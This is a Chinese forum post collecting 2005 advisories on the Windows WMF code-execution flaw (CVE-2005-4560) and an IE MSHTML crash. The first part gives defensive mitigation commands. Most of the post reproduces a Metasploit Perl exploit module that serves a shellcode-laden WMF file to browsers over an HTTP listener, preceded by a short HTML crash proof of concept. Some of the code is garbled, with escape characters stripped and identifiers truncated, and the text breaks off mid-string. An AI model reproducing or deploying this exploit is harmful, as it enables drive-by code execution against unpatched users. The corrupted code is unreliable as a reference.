- 论坛徽章:
- 0
|
绿盟科技紧急通告(Alert2005-10)\nWindows GDI32.DLL WMF 渲染引擎代码执行漏洞\n\n发布日期:2005-12-30\n\n\n受影响的软件及系统:\n====================\nWindows 2000\nWindows XP\nWindows 2003\n\n综述:\n======\n有人利用了一个微软尚未发布补丁的漏洞在互联网上传播恶意代码。该漏洞影响几乎所有Windows用户。\n\n目前发现对该漏洞利用主要是安装广告软件(AdWare),但随着漏洞的进一步的披露,很可能会有相应的入侵事件出现。\n\n分析:\n======\nWMF(Windows Metafile)文件是微软的一种图像文件格式,解析该图像的代码在GDI32.DLL文件中。\n\nWMF解析引擎在处理特殊的WMF文件时存在严重安全问题,可以导致图像文件中的数据被当作代码来执行。这漏洞的通用性很强,可以构造出对各版本Windows系统都可以有效利用的代码。\n\n无论是IE、FireFox、Opera等网络浏览器,还是Windows的资源浏览器或者其他图片处理软件,只要最终可以导致用户调用GDI32.DLL中的PlayMetaFile()函数来处理WMF文件,都会受该问题影响。所以这个漏洞的涉及范围非常广。\n \n对于Windows 2000,需要用相关联的程序打开恶意WMF文件才会触发漏洞,对于Windows XP和Windows 2003,则只需将鼠标移动到文件上,即可触发漏洞。\n\n入侵者可能将构造的恶意WMF文件放在网站上,诱使用户打开包含对该文件调用的网页;或者将恶意WMF文件通过邮件、聊天软件、P2P等途径发送给用户。\n\n解决方法:\n==========\n由于该漏洞目前尚无补丁,NSFOCUS安全小组建议用户在微软发布补丁之前将WMF文件的关联指向空,并解除资源浏览器等对WMF格式的支持,以减轻安全威胁。具体操作如下:\n\n打开命令提示符,在其中输入:\n ASSOC .wmf=\"\"\n ASSOC .emf=\"\"\n regsvr32 /u shimgvw.dll\n\n执行上述操作后,Windows XP和Windows 2003的“Windows 图片和传真查看器”将不再工作,并且资源管理器也不会再进行有关WMF文件的解析,即使安装了其他看图软件,在资源浏览器中双击也不会正常工作。但是如果直接用看图软件去打开恶意的WMF文件仍然会触发漏洞。\n\n如果要恢复系统上述操作,只需输入:\n ASSOC .wmf=wmffile\n ASSOC .emf=emffile\n regsvr32 shimgvw.dll\n\n附加信息:\n==========\nhttp://www.microsoft.com/technet/security/advisory/912840.mspx\nhttp://www.us-cert.gov/cas/techalerts/TA05-362A.html\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nMicrosoft Internet Explorer MSHTML.DLL HTML解析拒绝服务漏洞\n发布日期:2005-12-29\n更新日期:2005-12-29\n\n受影响系统:\nMicrosoft Internet Explorer 6.0\n描述:\n--------------------------------------------------------------------------------\nBUGTRAQ ID: 16079\n\nMicrosoft Windows是微软发布的非常流行的操作系统。\n\nMicrosoft Windows的MSHTML.DLL在解析特制HTML时存在拒绝服务漏洞。远程攻击者可以通过诱骗用户访问特制的HTML页面导致IE崩溃。\n\n<*来源:rgod (rgod@autistici.org)\n *>\n\n测试方法:\n--------------------------------------------------------------------------------\n\n警 告\n\n以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!\n\n-->\n<head>\n<style><!--\n#page div p:first-child:first-letter {\nborder-bottom: 2px ridge #F5DEB3;\n}\n//-->\n</style>\n</head>\n<body><div id=\"page\"><div><p><strong>suntzu</strong></p>\n\n建议:\n--------------------------------------------------------------------------------\n厂商补丁:\n\nMicrosoft\n---------\n目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:\n\nhttp://www.microsoft.com/windows/ie/default.asp\n\n\n\n\n\n\n\nMicrosoft Windows图形渲染引擎WMF格式代码执行漏洞\n发布日期:2005-12-28\n更新日期:2005-12-28\n\n受影响系统:\nMicrosoft Windows XP SP2\nMicrosoft Windows XP SP1\nMicrosoft Windows Server 2003 SP1\nMicrosoft Windows Server 2003\nMicrosoft Windows ME\nMicrosoft Windows 98se\nMicrosoft Windows 98\nMicrosoft Windows 2000SP4\n描述:\n--------------------------------------------------------------------------------\nBUGTRAQ ID: 16074\nCVE(CAN) ID: CVE-2005-4560\n\nMicrosoft Windows是微软发布的非常流行的操作系统。\n\nMicrosoft Windows的WMF图形渲染引擎中存在远程代码执行漏洞。如果用户受骗访问了恶意的WMF格式文件的话,则在引擎解析该文件时就会在用户系统上以系统权限执行任意代码。\n\n<*来源:Daniel Bonekeeper (thehazard@gmail.com)\n H D Moore (hdm@metasploit.com)\n \n 链接:http://marc.theaimsgroup.com/?l= ... 79604018479&w=2\n http://marc.theaimsgroup.com/?l= ... 79649211979&w=2\n http://www.us-cert.gov/cas/techalerts/TA05-362A.html\n*>\n\n测试方法:\n--------------------------------------------------------------------------------\n\n警 告\n\n以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!\n\n##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::ie_xp_pfv_metafile;\n\nuse strict;\nuse base \"Msf::Exploit\";\nuse Pex::Text;\nuse IO::Socket::INET;\n\nmy $advanced =\n {\n };\n\nmy $info =\n {\n /Name/ => /Windows XP/2003 Picture and Fax Viewer Metafile Overflow/,\n /Version/ => /$Revision: 1.2 $/,\n /Authors/ =>\n [\n /H D Moore <hdm [at] metasploit.com/\n ],\n\n /Description/ =>\n Pex::Text::Freeform(qq{\n This module exploits a vulnerability in the Windows Picture and \n Fax Viewer found in Windows XP and 2003. This vulnerability uses\n a corrupt Windows Metafile to execute arbitrary code and was reported by\n noemailpls[at]noemail.ziper to the Bugtraq mailing list after\n being discovered in the wild at the following URL:\n http://unionseek[DOT]com/d/t1/wmf_exp.htm\n}),\n\n /Arch/ => [ /x86/ ],\n /OS/ => [ /win32/, /winxp/, /win2003/ ],\n /Priv/ => 0,\n\n /UserOpts/ =>\n {\n /HTTPPORT/ => [ 1, /PORT/, /The local HTTP listener port/, 8080 ],\n /HTTPHOST/ => [ 0, /HOST/, /The local HTTP listener host/, \"0.0.0.0\" ],\n },\n\n /Payload/ =>\n {\n /Space/ => 5081,\n /Keys/ => [ /-ws2ord/, /-bind/ ],\n },\n\n /Refs/ =>\n [\n\n ],\n\n /DefaultTarget/ => 0,\n /Targets/ =>\n [\n [ /Automatic - Windows XP / Windows 2003/ ]\n ],\n \n /Keys/ => [ /ie/ ],\n\n /DisclosureDate/ => /Dec 27 2005/,\n };\n\nsub new\n{\n my $class = shift;\n my $self;\n\n $self = $class->SUPER::new(\n {\n /Info/ => $info,\n /Advanced/ => $advanced,\n },\n @_);\n\n return $self;\n}\n\nsub Exploit\n{\n my $self = shift;\n my $server = IO::Socket::INET->new(\n LocalHost => $self->GetVar(/HTTPHOST/),\n LocalPort => $self->GetVar(/HTTPPORT/),\n ReuseAddr => 1,\n Listen => 1,\n Proto => /tcp/);\n my $client;\n\n # Did the listener create fail?\n if (not defined($server))\n {\n $self-> rintLine(\"[-] Failed to create local HTTP listener on \" . $self->GetVar(/HTTPPORT/));\n return;\n }\n\n $self-> rintLine(\" Waiting for connections to http://\" . $self->GetVar(/HTTPHOST/) . \":\" . $self->GetVar(/HTTPPORT/) . \"/anything.wmf\" ;\n\n while (defined($client = $server->accept()))\n {\n $self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client));\n }\n\n return;\n}\n\nsub HandleHttpClient\n{\n my $self = shift;\n my ($fd) = @{{@_}}{qw/fd/};\n my $targetIdx = $self->GetVar(/TARGET/);\n my $target = $self->Targets->[$targetIdx];\n my $ret = $target->[1];\n my $shellcode = $self->GetVar(/EncodedPayload/)-> ayload;\n my $content;\n my $rhost;\n my $rport;\n my $content;\n my $targets =\n {\n \"Windows XP\" => [ ], # Automatic\n \"Windows 2003\" => [ ], # Automatic\n };\n my $target;\n my $os;\n\n # Read the HTTP command\n my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);\n\n # Read in the HTTP headers\n while (my $line = $fd->RecvLine(10))\n {\n my ($var, $val) = split /: /, $line;\n\n # Break out if we reach the end of the headers\n last if (not defined($var) or not defined($val));\n\n if ($var eq /User-Agent/)\n {\n $os = \"Windows 2003\" if (!$os and $val =~ /Windows NT 5.2/);\n $os = \"Windows XP\" if (!$os and $val =~ /Windows NT 5.1/);\n $os = \"Windows 2000\" if (!$os and $val =~ /Windows NT 5.0/);\n $os = \"Windows NT\" if (!$os and $val =~ /Windows NT/);\n $os = \"Unknown\" if (!$os);\n }\n }\n\n # Set the remote host information\n ($rport, $rhost) = ($fd-> eerPort, $fd-> eerAddr);\n\n $target = $targets->{$os};\n\n if (! $target) {\n $self-> rintLine(\" Unsupported HTTP Client connected from $rhost rport using $os\" ;\n }\n\n \n my $content = $self->wmf_head . $shellcode . $self->wmf_foot;\n \n \n $self-> rintLine(\" HTTP Client connected from $rhost rport using $os, sending payload...\" ;\n\n # Transmit the HTTP response\n $fd->Send(\n \"HTTP/1.1 200 OK\r\n\" .\n \"Content-Type: text/plain\r\n\" .\n \"Content-Length: \" . length($content) . \"\r\n\" .\n \"Connection: close\r\n\" .\n \"\r\n\" .\n \"$content\"\n );\n\n $fd->Close();\n}\n\n# Ripped straight from wmf_exp.wmf\nsub wmf_head {\n return \n \"x01x00x09x00x00x03x52x1fx00x00x06x00x3dx00x00x00\".\n \"x00x00x11x00x00x00x26x06x0fx00x18x00xffxffxffxff\".\n \"xffx00x10x00x00x00x00x00x00x00x00x00xc0x03x85x00\".\n \"xd0x02x00x00x09x00x00x00x26x06x0fx00x08x00xffxff\".\n \"xffxffx02x00x00x00x17x00x00x00x26x06x0fx00x23x00\".\n \"xffxffxffxffx04x00x1bx00x54x4ex50x50x14x00x20x00\".\n \"xb8x00x32x06x00x00xffxffx4fx00x14x00x00x00x4dx00\".\n \"x69x00x00x00x0ax00x00x00x26x06x0fx00x0ax00x54x4e\".\n \"x50x50x00x00x02x00xf4x03x09x00x00x00x26x06x0fx00\".\n \"x08x00xffxffxffxffx03x00x00x00x0fx00x00x00x26x06\".\n \"x0fx00x14x00x54x4ex50x50x04x00x0cx00x01x00x00x00\".\n \"x01x00x00x00x00x00x00x00x05x00x00x00x0bx02x00x00\".\n \"x00x00x05x00x00x00x0cx02xd0x02xc0x03x04x00x00x00\".\n \"x04x01x0dx00x07x00x00x00xfcx02x00x00x00x00x66x00\".\n \"x00x00x04x00x00x00x2dx01x00x00x09x00x00x00xfax02\".\n \"x05x00x00x00x00x00xffxffxffx00x22x00x04x00x00x00\".\n \"x2dx01x01x00x04x00x00x00x2dx01x00x00x09x00x00x00\".\n \"x1dx06x21x00xf0x00xd0x02xc0x03x00x00x00x00x04x00\".\n \"x00x00x2dx01x00x00x07x00x00x00xfcx02x00x00xffxff\".\n \"xffx00x00x00x04x00x00x00x2dx01x02x00x04x00x00x00\".\n \"xf0x01x00x00x09x00x00x00xfax02x00x00x00x00x00x00\".\n \"x00x00x00x00x22x00x04x00x00x00x2dx01x00x00x10x00\".\n \"x00x00x26x06x0fx00x16x00xffxffxffxffx00x00x47x00\".\n \"x00x00x8fx02x00x00x11x01x00x00xc1x02x00x00x08x00\".\n \"x00x00x26x06x0fx00x06x00xffxffxffxffx01x00x0dx00\".\n \"x00x00xfbx02x00x00x00x00x00x00x00x00x00x00x00x00\".\n \"x00x01x17x00x00x00x00x00x04x00x00x00x2dx01x03x00\".\n \"x05x00x00x00x09x02x00x00x00x02x05x00x00x00x14x02\".\n \"x00x00x00x00x04x00x00x00x02x01x02x00x10x00x00x00\".\n \"x26x06x09x00x16x00\";\n}\n\n# Ripped straight from wmf_exp.wmf\nsub wmf_foot {\n return\n \"x00x09x00x04x00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x15x00x00x00x32x0axa5\".\n \"x01x2ax00x09x00x00x00x77x77x77x77x77x77x77x77x20\".\n \"x00x0axfbx08x00x0ax00x06x00x09x00x09x00x07x00x09\".\n \"x00x05x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x8ax14x02x00x00x00x00x04x70x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x19x00x00x00x32x0axbbx01x2a\".\n \"x00x0cx00x00x00x77x77x77x77x20x3dx20x77x77x77x77\".\n \"x77x0cx00x0cx00x07x00x0cx00x05x00x0ax00x05x00x0c\".\n \"x00x0cx00x07x00x0ex00x0dx00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x09x00x00\".\n \"x00x32x0axbbx01xa3x00x01x00x00x00x2dx00x06x00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x25x00x00x00x32x0axbbx01xa9x00x14x00x00\".\n \"x00x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77\".\n \"x77x77x77x77x20x05x00x0ax00x0ax00x05x00x0ax00x05\".\n \"x00x06x00x0ax00x08x00x09x00x05x00x0ax00x08x00x0a\".\n \"x00x06x00x09x00x05x00x0ax00x08x00x05x00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04xbex00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x3dx00x00x00x32x0axd1x01x2ax00x24x00x00x00x49\".\n \"x20x77x77x77x77x77x20x42x20x3dx20x77x77x77x77x77\".\n \"x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77\".\n \"x20x42x20x07x00x05x00x0bx00x0ax00x0ax00x0ax00x09\".\n \"x00x05x00x0cx00x05x00x0bx00x05x00x05x00x0ax00x0a\".\n \"x00x05x00x0ax00x05x00x06x00x0ax00x08x00x05x00x0a\".\n \"x00x06x00x04x00x0ex00x0bx00x05x00x0ax00x0ax00x0a\".\n \"x00x0ax00x0ax00x04x00x0dx00x05x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x09\".\n \"x00x00x00x32x0axe8x01x2ax00x01x00x00x00x49x00x07\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x9fx0ax01x01x00x09x00x00x00x32x0axe8x01x31x00x01\".\n \"x00x00x00x2dx00x06x00x04x00x00x00x2ex01x01x00x04\".\n \"x00x00x00x02xb0x02x00x05x00x00x00x09x02xffxffxff\".\n \"x02x05x00x00x00x14x02x00x00x00x00x04x00x00x00x2e\".\n \"x01x18x00x04x00x00x00x02x01x01x00x30x00x00x00x32\".\n \"x0axe8x01x37x00x1bx00x00x00x77x77x77x77x77x77x77\".\n \"x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77\".\n \"x77x77x77x20x00x0cx00x0cx00x07x00x0ex00x0dx00x05\".\n \"x00x0bx00x05x00x05x00x0ax00x0ax00x05x00x0ax00x05\".\n \"x00x06x00x0ax00x08x00x05x00x0ax00x06x00x04x00x0c\".\n \"x00x0cx00x07x00x0ex00x0dx00x05x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x32x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x24\".\n \"x00x00x00x32x0ax06x02x2ax00x13x00x00x00x77x77x77\".\n \"x77x77x77x77x77x77x77x77x77x77x77x77x77x77x77x20\".\n \"x00x07x22x0dx00x0cx00x05x00x0bx00x05x00x05x00x0a\".\n \"x00x0ax00x05x00x0ax00x05x00x06x00x0ax00x08x00x05\".\n \"xe9x0ax00x06x00x05x00x04x00x00x00x2ex7ex01x00x04\".\n \"x00x00x00x02x01x02x00x15x00x00x00xfbx02xe5xffx00\".\n \"x00x00x00x00x00xbcx02x00x00x00x00x00x40x00x00x54\".\n \"x69x6dx65x73x20x4ex65x77x20x52x6fx6dx61x6ex00x00\".\n \"x11x04x00x00x00x2dx01x03x00x04x00x00x00xf0x01x05\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x15x00x00x00x32x0ax06x02xbex00x09\".\n \"x00x00x00x77x77x77x77x77x77x77x77x77x00x0dx00x0f\".\n \"x00x0ex00x0ex00x09x00x0dx00x0ax00x08x00x0ax00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x15\".\n \"x00x00x00xfbx02xedxffx00x00x00x00x00x00xbcx02x00\".\n \"x00x00x00x00x40x00x00x54x69x6dx65x73x20x4ex65x77\".\n \"x20x52x6fx6dx61x6ex00x00x11x04x00x00x00x2dx01x05\".\n \"x00x08x00x00x00xf0x01x03x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x13x00x00\".\n \"x00x32x0ax06x02x2dx01x08x00x00x00x77x77x77x77x77\".\n \"x77x77x20x0ax00x08x00x0ax00x06x00x09x00x05x00x0a\".\n \"x00x05x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x0fx00x00x00x32x0ax1ex02x2a\".\n \"x00x05x00x00x00x77x77x77x20x3dx00x07x00x0ex00x0d\".\n \"x00x05x00x0ax00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x83x59x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2exc3x18\".\n \"x00x04x00x00x00x02x57x01x00x18x00x00xf2x32x0ax1e\".\n \"x02x60x00x0bx00x00x00x77x77x77x77x77x77x77x77x77\".\n \"x77x77x00x05x00x0ax00x06x00x09x00x08x00x05x00x09\".\n \"x00x0ax00x0bx00x05x00x0ax00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x09x00x00\".\n \"x00x32x0ax1ex02xb8x00x01x00x00x00x2dx00x06x00x04\".\n \"x00x00x00x2ex01x01x00x04x00x00x00x02x01x02x00x05\".\n \"x00x00x00x09x02xffxffxffx02x05x00x00x00x14x02x00\".\n \"x00x00x00x04x00x00x00x2ex01x18x00x04x00x00x00x02\".\n \"x01x01x00x10x00x00x00xcdx0ax1ex02xbex00x06x00x00\".\n \"x00x31x20x77x77x77x77x09x00x05x00x0ax00x09x00x06\".\n \"x00x0ax00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x09x00x00x00x32x0ax1ex02xef\".\n \"x00x01x00x00x00x2dx00x05x00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x00x00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x22x00x00\".\n \"x00x32x0ax1ex02xf4x00x12x00x00x00x77x77x77x77x77\".\n \"x77x77x77x77x77x77x77x77x77x77x77x77x20x08x00x0a\".\n \"x00x0ax00x09x00x09x00x08x00x06x00x05x00x0ax00x0a\".\n \"x00x05x00x09x00x0ax00x08x00x09x00x0fx00x09x00x05\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x1bx00x00x00x32x0ax34x02x2ax00x0d\".\n \"x00x00x00x77x77x77x77x77x77x77x77x77x77x77x77x77\".\n \"x00x07x00x0fx00x0cx00x04x00x0bx00x05x00x05x00x0a\".\n \"x00x08x00x0ax00x05x00x05x00x0ax00x04x00x00x00x2e\".\n \"x01x01x00x04x87x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x09\".\n \"x00x00x00x32x0ax34x02x95x00x01x00x00xe0x2dx00x06\".\n \"x00x04x00x00x00x2ex01x01x9fx04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04xc6x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x24x00x00x00x32x0ax34x02x9bx00x13\".\n \"x00x00x00x77x77x77x77x77x77x77x77x77x77x77x77x77\".\n \"x77x77x77x77x77x20x00x05x00x05x00x0bx00x09x00x04\".\n \"x00x0ax00x08x00x09x00x0ex00x06x00x0ax00x05x00x06\".\n \"x00x09x00x09x00x06x00xb8x00x08x00x05x00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x12x00x00x00x32x0ax4bx02x2ax00x07x00x00x00x4a\".\n \"x4ex4bx20x3dx20x63x00x0ax00x0ex00x0ex00x05x00x0a\".\n \"x00x05x00x09x00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x09x00x00x00x32x0ax4b\".\n \"x02x6dx00x01x00x00x00x2dx00x05x00x04x00x00x00x2e\".\n \"x01x01x00x04x00x00x00x02x01x02x00x05x00x00x00x09\".\n \"x02xffxffxffx02x05x00x00x00x14x02x00x00x00x00x04\".\n \"x00x00x00x2ex01x18x00x04x00x00x00x02x01x01x00x0f\".\n \"x00x00x00x32x0ax4bx02x72x00x05x00x00x00x4ax75x6e\".\n \"x20x4ex00x0ax00x0ax00x0ax00x05x00x0ex00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x95x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x09x00x00x00x32x0ax4bx02xa3x00x01x00x00x00xe8\".\n \"x00x06x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x7cx00x13x00x00x00x32x0ax4bx02xa9\".\n \"x00x08x00x00x00x74x65x72x6dx69x6ex61x6cx06x00x09\".\n \"x00x08x00x0fx00x05x00x0ax00x0ax00x05x00x04x00x00\".\n \"x00xbax01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02x07xffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x10x00x00x00x32x0ax4bx02xf1x00x06x00x00x00x6b\".\n \"x69x74x61x73x65x0bx00x05x00x0ax00x0ax00x07x00x09\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x81x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x10x00x00x00x32x0ax61x02x2ax00x06\".\n \"xefx00x00x4dx41x50x4bx20x3dx12x00x0dx00x0cx00x0e\".\n \"x00x05x00x0bx00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffxffx02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x12x00x00x00x32x0ax61\".\n \"x02x78x00x07x00x00x00x77x77x77x77x77x77x77x00x0f\".\n \"x00x05x00x06x00x09x00x0ax00x09x00x0ax00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"x00x09x02xffxffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x09x00x00x00x32x0ax61x02xb8x00x01x00x00x00x2d\".\n \"x00x06x00x04x00x00x00x2ex01x01x00x04x00x00x00x02\".\n \"x01x02x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x04x00x00x00x2ex01x18x00x04\".\n \"x00x00x00x02x01x01x00x21x00x00x00x32x0ax61x02xbe\".\n \"x00x11x00x00x00x77x77x77x77x77x77x77x77x77x77x77\".\n \"x77x77x77x77x77x77x00x09x00x24x00x06x00x05x00x09\".\n \"x00x0ax00x05x00x09x00x0ax00x05x00x0ax00x08x00x0a\".\n \"x00x06x00x09x00x05x00x0ax00x04x00x00x00x2ex01x01\".\n \"x00x04x00x00x00x02x01x02x00x05x00x00x00x09x02xff\".\n \"xffxffx02x05x00x00x00x14x02x00x00x3cx00x04x00x00\".\n \"x00x2ex01x18x00x04x00x00x00x02x01x01x00x10x7ex00\".\n \"x00x32x0ax61x02x49x01x06x00x00x00x77x77x77x77x77\".\n \"x77x0bx00x05x00x0ax7ex0ax00x07x00x09x00x04x00x00\".\n \"x00x2ex01x01x00x04x00x00x00x02x01x02x00x04x00x00\".\n \"x00x02x01x02x00x04x00x00x00x2dx01x04x00x04x00x00\".\n \"x00x2dx01x01x00x07x00x00x00x1bx04x84x02x92x03x28\".\n \"x00xc8x01x04x00x00x00x2dx01x02x00x04x00x00x00x2d\".\n \"x01x00x00x05x00x00x00x09x02xffxffxffx02x05x00x00\".\n \"x00x14x02x00x00x00x00x15x00x00x00xfbx02xebxffx00\".\n \"x00x00x00x00x00xbcx02x00x00x00x00x00x40x00x00x54\".\n \"x69x6dx65x73x20x4ex65x77x20x52x6fx6dx61x6ex00x00\".\n \"x00x04x00x00x00x2dx01x03x00x04x00x00x00xf0x01x05\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2exc1x18x00x04x00x00\".\n \"x00x02x01x01x00x1cx00x00x00x32x0ax42x00xd2x01x0e\".\n \"x00x00x00x71x71x71x20x3dx20x71x71x71x71x2fx71x71\".\n \"x71x13x00x0ex00x11x00x05x00x0dx00x06x00x13x00x0f\".\n \"x00x0ex00x11x00x06x00x0ex00x0fx00x11x00x04x00x00\".\n \"x00x1fx01x01x00x04x00x00x00x02x01x02x00x05x00x00\".\n \"xd0x09x02xffxffxffx02x05x00x00x00x14x02x00x00x00\".\n \"x00x04x00x00x00x2ex01x18x00x04x00x00x00x02x01x01\".\n \"x00x10x00x00x00x32x0ax42x00x96x02x06x00x00x00x71\".\n \"x71x71x71x71x71x0cx00x06x00x0bx00x0bx00x08x00x0a\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x02\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x00x00\".\n \"x00x02x01x01x00x16x00x00x00x32x0ax5bx00xd2x01x0a\".\n \"x00xd0x00x71x71x71x71x20x3dx20x71x71x71x13x00x0e\".\n \"x00x11x00x11x00x05x00x0cx00x06x00x14x00x0ex00x11\".\n \"x00x04x00x00x00x2ex01x01x00x04x00x00x00x02x01x7c\".\n \"x00x05x00x00x00x09x02xffxffxffx02x05x00x00x00x14\".\n \"x02x00x00x00x00x04x00x00x00x2ex01x18x00x04x0ax00\".\n \"x00x02x01x01x00x10x00x00x00x32x0ax5bx00x65x02x06\".\n \"x00x00x00x71x71x71x71x71x71x0cx00x05x00x0bx00x0b\".\n \"x00x08x00x0ax00x04x00x00x00x2ex01x01x00x04x00x00\".\n \"x00x02x01x02x00x05x00x00x00x09x02xffxffx2ex02x05\".\n \"x00x00x00x14x02x00x00x00x00x04x00x00x00x2ex01x18\".\n \"x00x04x00x00x00x02x01x01x00x3dx00x00x00x32x0ax75\".\n \"x00xd2x01x24x00x00x00x71x71x71x71x71x71x71x71x71\".\n \"x71x71x71x71x71x71x71x71x71x71x71x71x71x71x71x71\".\n \"x71x71x71x71x71x71x71x71x20x42x20x0fx00x0ex00x05\".\n \"x00x0bx00x0bx00x0cx00x0bx00x0bx00x05x00x0fx00x05\".\n \"x00x0cx00x06x00x0bx00x0bx00x0bx00x05x00x0ax00x0c\".\n 